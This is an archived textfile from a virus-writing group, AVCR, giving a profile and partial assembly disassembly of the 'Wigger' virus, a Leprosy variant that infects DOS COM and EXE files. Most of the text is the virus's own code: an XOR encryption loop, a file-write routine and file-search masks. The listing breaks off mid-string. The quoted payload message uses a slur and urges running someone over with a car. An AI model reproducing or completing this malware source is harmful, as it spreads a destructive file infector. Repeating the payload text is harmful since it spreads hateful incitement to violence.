💾 Archived View for spam.works › mirrors › textfiles › virus › avcr-01.008 captured on 2023-06-16 at 21:01:07.
-=-=-=-=-=-=-
??????? ? ? ????????? ? ????????
? ? ? ? ? ??? ??
? ? ? ? ? ? ??
??????????? ? ? ? ?
? ? ? ? ? ?
? ? ? ? ? ?
? ? ?????? ????????? ?
??? ??? ???? ??????? ???? ???????? ? ? ? ???????
? ??? ? ? ? ? ? ? ?? ? ?? ? ?
? ? ? ? ? ???? ? ? ?? ? ? ? ? ?????
? ? ???????? ? ?? ???????? ?? ? ? ? ? ?
? ? ? ? ??????? ? ? ???????? ? ? ?? ???????
Distributed By Amateur Virus Creation & Research Group (AVCR)
?????????????????????????????????????????????????????????????????????????????
Research of the wigger virus
by
Security Threat
Name: Wigger
-----------------------------------------------------------------------------
Alias:
-----------------------------------------------------------------------------
Type Of Code: Not Informed
-----------------------------------------------------------------------------
VSUM Information: No info found on WIGGER.COM
-----------------------------------------------------------------------------
Antivirus Detection:
(1)
ThunderByte Anti Virus (TBAV) reported wigger.com as leprosy
(2)
Frisk Software's F-Protect (F-PROT) reported wigger.com as leprosy.b
(3)
McAfee Softwares Anti Virus (SCAN.EXE) reported wigger.com as leprosy.b
(4)
MicroSoft Anti Virus (MSAV.EXE) reported wigger.com as "the leprosy virus"
-----------------------------------------------------------------------------
Execution Results: Infects all COM and EXE files.
-----------------------------------------------------------------------------
Cleaning Recommendations: Impossible. Infected programs must be deleted
-----------------------------------------------------------------------------
Researcher's Notes: As infecting either reads "program to big to fit in
memory" or "You have noticed wiggers seem to have taken over the high school
scene." "If you see one, please hit him with your car". It is a variant of
leprosy. Also "News flash","Plague","viper","busted","leprosy-c",
"leprosy-d", "scribble","seneca","surfer","xarbras",and "angel of death"
-----------------------------------------------------------------------------
Disassembly of the wigger Virus
PAGE 60,132
;?????????? CODE_SEG_1 ????????????????????????????????????????????????????????
CODE_SEG_1 segment para public
assume CS:CODE_SEG_1, DS:CODE_SEG_1, SS:CODE_SEG_1, ES:CODE_SEG_1
org 100h
;???????????????????????????????????????????????????????????????????????????????
;?
;? ENTRY POINT
;?
;???????????????????????????????????????????????????????????????????????????????
;???????????????????????????????????????????????????????????????????????????????
;?
;? PROCEDURE proc_start
;?
;???????????????????????????????????????????????????????????????????????????????
proc_start proc far
start: ; N-Ref=0
call near ptr proc_2
jmp loc_5
proc_start endp
var1_106 db 0
;???????????????????????????????????????????????????????????????????????????????
;?
;? PROCEDURE proc_1
;?
;???????????????????????????????????????????????????????????????????????????????
proc_1 proc near
mov BX,Word Ptr var1_2a3 ; [6556:02A3] = 0
push BX
call near ptr proc_2
pop BX
mov CX,29Ah
mov DX,offset var1_100
mov AH,40h ; '@'
int 21h ; DOS func ( ah ) = 40h
; Write to file or device
;BX-file handle
; CX-bytes to read DS:DX-DTA
;if CF=0 AX-bytes read
; else AX-ret code
call near ptr proc_2
retn
proc_1 endp
;???????????????????????????????????????????????????????????????????????????????
;?
;? PROCEDURE proc_2
;?
;???????????????????????????????????????????????????????????????????????????????
proc_2 proc near
mov BX,offset var1_131
loc_1: ; N-Ref=1
mov AH,Byte Ptr [BX]
xor AH,Byte Ptr var1_106 ; [6556:0106] = 8B00h
mov Byte Ptr [BX],AH
inc BX
cmp BX,3CBh
jle loc_1 ; Jump if not greater ( <= )
retn
proc_2 endp
var1_131 db '*.EXE'
db 0
var1_137 db '*.COM'
db 0
var1_13d db 2Eh, 2Eh, 0
var1_140 db 0Dh, 0Ah
db 'Program too big to fit in memory